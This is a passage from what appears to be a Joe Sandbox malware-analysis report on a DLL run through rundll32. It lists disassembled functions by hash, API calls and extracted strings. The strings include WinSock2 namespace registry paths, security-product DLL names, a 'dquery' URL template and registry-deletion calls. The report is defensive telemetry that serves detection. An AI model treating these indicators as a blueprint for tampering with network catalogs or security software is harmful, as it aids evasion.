                                                                                    • Opcode Fuzzy Hash: bb05992a4f7f9f49a53442d2e1aaa10a6dfd61868bba92c4a54245666e2faaf4
                                                                                    • Instruction Fuzzy Hash: 3FD1FC32609B8596EA70DB14E4943DEB7B2F789384F805115E6CD43BAEDF79C64ACB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
                                                                                    • String ID:
                                                                                    • API String ID: 505489203-0
                                                                                    • Opcode ID: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
                                                                                    • Instruction ID: 546e40b67bc81cdcf22b9085e67948acfa9500907e31d87aed3a5e4506fe483b
                                                                                    • Opcode Fuzzy Hash: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
                                                                                    • Instruction Fuzzy Hash: A6711C32B05B548AFB96CFA1E8403ED33B5B70879DF468025EE5627A98DF38C659C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                                    • API String ID: 0-1196714001
                                                                                    • Opcode ID: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
                                                                                    • Instruction ID: 902fc08f0a24e927d00bac490aa4b2e4fc0ab2cffff010c51715f7c20a33671b
                                                                                    • Opcode Fuzzy Hash: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
                                                                                    • Instruction Fuzzy Hash: 8B91E232701B4886EB96CB62A8407D973A0FB8DBD4F058225BF6D17795EF39CA49C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
                                                                                    • String ID: hotkey$internetshortcut
                                                                                    • API String ID: 2885337837-1159320594
                                                                                    • Opcode ID: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
                                                                                    • Instruction ID: 4557ede77b3344c9b7d134b2ef366cc1eba795b6e68afc4d6349487d3a9816dc
                                                                                    • Opcode Fuzzy Hash: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
                                                                                    • Instruction Fuzzy Hash: 56915972701B4886EB96DF69D84079D33A0F748BE4F44C626AA6D477E4DF38CA99C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentSleepThread
                                                                                    • String ID: JudgeVersion
                                                                                    • API String ID: 1164918020-3141317846
                                                                                    • Opcode ID: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
                                                                                    • Instruction ID: 47c15e1018a900855fb3b169089698e2b9417bb7c9542535bb0a2760737ebbf6
                                                                                    • Opcode Fuzzy Hash: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
                                                                                    • Instruction Fuzzy Hash: EE51AB32604A889AFB979F65DD843DE73A1F3097D4F468525EA2A83790DF34CA99C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesDeleteErrorLast$MutexRelease
                                                                                    • String ID: PRAGMA synchronous = OFF;
                                                                                    • API String ID: 874664252-1854902270
                                                                                    • Opcode ID: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
                                                                                    • Instruction ID: fa77642fd0660764f5a509da37546a8681fbf34ddf7b90f5fa11f8d2a21f9c13
                                                                                    • Opcode Fuzzy Hash: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
                                                                                    • Instruction Fuzzy Hash: 6551A335700B8996FEDE8F6594517B92390AB4DBD4F048524BEAE677E0DF35CA098300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Path$Exists$ModuleNameRemoveSpecmemset
                                                                                    • String ID: %hd.%hd.%hd.%hd$\360ver.dll$\QHVer.dll
                                                                                    • API String ID: 3680197243-1037704697
                                                                                    • Opcode ID: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
                                                                                    • Instruction ID: 3305af636dff0720fe62b84610ade698e39c861821be0ce054630d245facfc05
                                                                                    • Opcode Fuzzy Hash: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
                                                                                    • Instruction Fuzzy Hash: 73516572701A4982E751DB29D84078A77A0F789BF4F408212FA6D877E5DF39CA49CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
                                                                                    • String ID: http://%s/dquery
                                                                                    • API String ID: 3689213441-2489601265
                                                                                    • Opcode ID: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
                                                                                    • Instruction ID: 80c6b5da0a524930356cbb69355e12e6cacd4ac9a253962bc35af1aeed2dd264
                                                                                    • Opcode Fuzzy Hash: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
                                                                                    • Instruction Fuzzy Hash: F3619076211F4986E7829B64EC843D933A0FB497A8F518316ED29076E5EF78C78DC344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
                                                                                    • String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
                                                                                    • API String ID: 830827343-1853890022
                                                                                    • Opcode ID: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
                                                                                    • Instruction ID: ed8f6b5c495fe7c06dfc5e892af335cc1c0a2688f7bbfb93a7c5ae832a2d3b97
                                                                                    • Opcode Fuzzy Hash: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
                                                                                    • Instruction Fuzzy Hash: 12413B72214A8995EBB5DF21EC413D92360F7897C8F808112FA4D9B5A9DF39C70DCB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
                                                                                    • String ID: :
                                                                                    • API String ID: 2941325240-336475711
                                                                                    • Opcode ID: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
                                                                                    • Instruction ID: dc65f2bc49bddac93e31888ce9d3fd3537e0c7ef9c239f6ea7558133a88505f1
                                                                                    • Opcode Fuzzy Hash: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
                                                                                    • Instruction Fuzzy Hash: 7731747260458881EAB5DB16E4543ED7361FB8CBC4F44D115FA4E86AA5DF3CCB49C704
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassNameTextWindowmemset
                                                                                    • String ID: ApplicationFrameWindow$Microsoft Edge
                                                                                    • API String ID: 1817102812-2764675319
                                                                                    • Opcode ID: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
                                                                                    • Instruction ID: cbb3fe303a1e4ce820f684c33e5910fd11efe3c021ca595ae8cabc946684c7f6
                                                                                    • Opcode Fuzzy Hash: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
                                                                                    • Instruction Fuzzy Hash: 3721943135478985FAA19F65E8843DA6361F78C7C4F648125AAAD872A4EF7CC74DC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$Delete
                                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                                    • API String ID: 2668475584-1053001802
                                                                                    • Opcode ID: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
                                                                                    • Instruction ID: 915c5fbfce3db82b286e5c0612373c0c02ac60b4c6bcd7d6af2be75d68b23045
                                                                                    • Opcode Fuzzy Hash: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
                                                                                    • Instruction Fuzzy Hash: 9F314675209A4891FBA2CB11EC047D973A0BB4DBD4F58C025AE9A07BA4EF3CC748D310
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$AppendCriticalPathSection$memset$EnterFileModuleName$??2@CountErrorInitializeLastLeaveSpin
                                                                                    • String ID: ..\deepscan\$speedmem2.hg
                                                                                    • API String ID: 2338990259-1390971677
                                                                                    • Opcode ID: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                                    • Instruction ID: 91bce694e0342d9d21a92653d8ecf9702c458f92e478111cc4d5f0d53c5c3f7e
                                                                                    • Opcode Fuzzy Hash: 1f5c69f5d04849719002e6335fbd6f545d460fa84012e21aa4d7e04e73bbc5ea
                                                                                    • Instruction Fuzzy Hash: BB212C35215B4D81EA928B64FC953996360FB5C7E4F409215E96D077B4EF78C64EC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionhtonlhtons$EnterLeavememmove
                                                                                    • String ID:
                                                                                    • API String ID: 33644419-0
                                                                                    • Opcode ID: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                                    • Instruction ID: 90b71582b8c4a32b78347334d3d295f004072f45cff62f784db803bd1658b447
                                                                                    • Opcode Fuzzy Hash: c447bd6221281bfe5dd6872084f78464a8d5e064d41710de40e0bf531ce06f55
                                                                                    • Instruction Fuzzy Hash: 69614736B00B549AF792DFA1E9503ED33B5B70878CF458019EE5627A98DF34866EC348
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitVariant$ArraySafe$CreateElement
                                                                                    • String ID:
                                                                                    • API String ID: 3308809976-0
                                                                                    • Opcode ID: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                                    • Instruction ID: 146264a788ca7c4eb20d782c9947d04824275c30ee96bc1b713ea33f9e3da92e
                                                                                    • Opcode Fuzzy Hash: 3e6f35141bead04b4f889ba04b40996eb253cad0316321e95f0b8ebe6d532838
                                                                                    • Instruction Fuzzy Hash: 52515A32B00A548AE781CFA5EC843DD37B0F7487A9F158125EA5A97764EF34C64AC340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcsicmp
                                                                                    • String ID: %I64u$.exe$InitString$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
                                                                                    • API String ID: 2081463915-3789319691
                                                                                    • Opcode ID: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                                    • Instruction ID: 99d661dcfab4fd9f60583e58d61e1d075c9151c162a47e32eebc6396990c7acc
                                                                                    • Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                                    • Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
                                                                                    • String ID: clsid$clsid2
                                                                                    • API String ID: 2934854147-3646038404
                                                                                    • Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                                    • Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
                                                                                    • Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                                    • Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??3@memmovememset
                                                                                    • String ID: generic$unknown error
                                                                                    • API String ID: 2528313377-3628847473
                                                                                    • Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                                    • Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
                                                                                    • Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                                    • Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                    • String ID: AddDllDirectory$kernel32
                                                                                    • API String ID: 1437655972-3758863895
                                                                                    • Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
